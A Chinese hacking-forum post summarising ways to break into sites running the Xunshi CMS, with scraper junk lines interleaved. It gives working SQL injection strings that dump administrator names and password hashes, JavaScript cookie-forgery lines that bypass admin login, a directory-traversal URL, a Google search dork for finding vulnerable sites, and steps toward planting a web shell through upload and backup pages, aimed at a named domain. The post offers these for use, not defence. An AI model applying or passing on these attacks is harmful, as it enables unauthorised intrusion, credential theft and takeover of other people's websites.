中国网络渗透测试联盟
标题:
讯时漏洞总结
[打印本页]
作者:
admin
时间:
2013-1-16 21:25
标题:
讯时漏洞总结
by:血封忆尘
3 q. `& @. r: ?& s4 F+ t
5 K3 E( F% Y2 J* o9 J$ E) G0 Y" G& N7 i
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
' i3 e8 x: i' B. u2 @& y9 ?
) T: t6 {9 L8 y9 I
以下本文总结来自黑防去年第9期杂志上的内容...
" D& i) l- J( m! Q; \9 U: C& ]
' o- ~# G# e- Q( U* i# u+ O
先说一个注入吧:
http://www.political-security.com/news_more.asp?lm=2
%41nd 1=2 union %53elect 1,2,3,0x3b%
! v/ {2 h8 T: @* v
0 d6 c+ `! B( Q) z
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
& B8 o7 O' \$ L, ~9 f5 l. G
, {! t. D) I7 R0 e/ \) y
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
5 x7 [# d0 L9 e) T7 U/ N
这里一个注入
" h3 p' o) f6 s# v) Q& y( V
3 c& s# n9 H' M8 i! j
效果如图:
9 r5 u8 H: M3 P+ H/ b" H `4 t* c) [
& A/ h+ ?. ^( i3 w7 j
$ i$ M T# ?. Z) ]( f- j
, p/ |4 C* S i
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
0 n' {5 f: N, F9 T
/ n7 B1 X2 E# j7 X1 E, Z* v) j
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
( o3 f. d9 a" k4 d n8 n
( w5 {( l1 y6 K! |* O- _
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
% _' F. h) ]# c# ~9 |9 o: Z
2 T8 n& Y! F* m
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
- ?* V( @9 [$ T* a- s( g4 m& U1 n9 v' F% z
6 l) ~8 o) _- `! w1 q5 P3 g, ~
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
3 @/ x% D+ [" ^5 g" W/ m
1 p3 q% ]% }' Q0 {7 K3 c
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
/ G- n8 C0 K1 N, r# ?3 A
2 u+ Y2 V; v# ]( J+ d
访问这页面来列目录..步骤如下:
7 P" J& Q7 j9 i1 M
2 A" D9 l/ E9 n! B+ F/ O$ P
javascript:alert(document.cookie="admindj=1")
+ H' @ N( }# C# a0 B
5 t( n) w0 Z6 }
http://www.political-security.co ... asp?id=46&dir=../..
1 c% V$ G+ E( D$ x+ c# g# y- ~
/ Y" h! `* t: \1 r, O3 {2 h1 |3 X
效果如图:
) l, f2 P- J* [: [; y. T$ f- K
* v& g, g' V5 S [
+ [# |2 J3 C7 h m ~6 [
; c" i7 g2 D2 ~" m0 v% m9 F" |
这样全站目录都能瞧了..找到后台目录..进去..
) }: w; ?0 ?2 @( {% A( N/ Y
8 M! d5 l; h4 {! H: F
那么进了后台怎么拿shell??上传--备份就ok了..
, c& B: m- t4 J" q7 L
" b* \, q) c3 K: `* n I6 b( o
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
3 u% b1 Z0 N' l7 O
$ f% e( c) v; B- j J9 R, u
这个我也碰到过一次..你都可以通过列目录来实现..
- ]5 y, K1 N, V9 b5 F
+ ^7 z2 |' C" {; d/ z
javascript:alert(document.cookie="admindj=1")
+ ]' h& {- }. d' r1 C6 w- Q
6 R1 Y/ L+ ^7 b5 M2 A8 Q ?. d. z
http://www.political-security.co ... p?action=BackupData
% l$ N3 R$ L5 C2 |
2 ~ K) X2 k, G
备份ok..
" I+ P1 I& b0 m2 V A! s% f0 U$ \0 g6 \
8 U! V: t' R8 O
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
* s- _2 }8 F! G8 y) }
; @- t2 g6 P/ J% {. d# }8 e% ^
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
+ |2 e) @9 n/ f# N/ O3 d
3 ?) P& w. |; |# `
然后访问此页面进行注入..步骤如下:
. l0 ]& t* J7 b6 B7 L1 H' u
7 v- H. h; o0 \+ X8 _
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
7 Z8 \0 {' P+ v' R
1 g9 P1 J2 j$ S, I: P
然后请求admin/admin_chk.asp页面
; Y, ?8 `9 O+ G- X2 b; i
/ F( _* Y9 v' }: H, h, R) ^/ y
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
" d4 K/ H0 r3 B' ^6 r
7 v1 E% V" W; O1 E* j
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
. n& A. [% R& I: Q2 P9 d) ~5 `" G0 I! N
. S, }6 l5 v3 V
效果如图所示:
+ x% x' C# @% D2 Y
( b: f% w$ ]+ k( M) |
/ o+ x* |+ o/ w8 K* r; Q
' L, c o: E: b
讯时漏洞2
9 V Q( k1 g: N! `7 N5 e0 @; i
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
- r; a; w4 w# { Y5 W5 i4 v+ [+ n! w
8 K0 \. n3 B' }' p2 c9 d i N( y
1、/admin/admin_news_pl_view.asp?id=1
8 v$ Z g; W! }, v
//id任意 填入以下语句
+ O' x2 q' ~0 }" ?% K
; A V ~: m- M; Q9 }
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
3 J0 D) u* d |) E0 Q
# n0 S# Z" v2 Y! }/ g& `
& J6 P7 b; w5 j4 [% H
$ l6 Q. {2 K7 r' s& y7 J9 s
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
' P* ?3 c+ Q9 l- P1 s
" l, L2 }, a: c6 j
9 R* G3 I, f, W: [
/ q' v5 Z2 @2 _
爆出管理员帐号和密码了
; R* Y+ [( e1 _7 W- N7 f, L: W3 h
+ Z. s5 m9 r+ C2 v4 w$ J+ K3 h) F8 k
( G! s: V5 l9 M
9 W) f" a0 J7 Z' B
4、cookies进后台
2 {! L6 I8 `) Z1 ?8 z/ @3 b
" |6 [( T) T4 V. H6 O
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
8 a: Q ^2 ~+ p' F
T6 Q+ V8 |9 @0 K$ S( |
( T! n5 a# ~; A
1 C; j# z* Q$ @0 U1 K
5、后台用了cookie验证,直接访问
http://www.political-security.com/admin/admin_index.asp
就OK了!
% `" t( S, x. y: ?7 C1 U. f
' t" d& C5 Z7 {* P! o6 E
5 ?% v. ~ v8 H" [
+ }- U( L) k! R, |" Y" m8 r
6、后台有上传和备份取SHELL不难。
) B3 G/ T) e P& T# b( |4 N! p- R. L
7 o* m0 p) h t' @" s
7、讯时还有个列目录漏洞:
http://www.political-security.co ... asp?id=46&dir=../..
0 ?* C, h' }; t0 O1 i: q
) B1 D6 d6 m; U# u
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问
http://www.political-security.com
/admin/admin_db_backup.asp?action=BackupData
,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
. Y+ d8 [( _; ?, S* {& V' z
j' |9 b, G8 J7 c* d( b! r) R P0 b
2 u$ C: h0 V: x; f
i! @& \% z# [
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2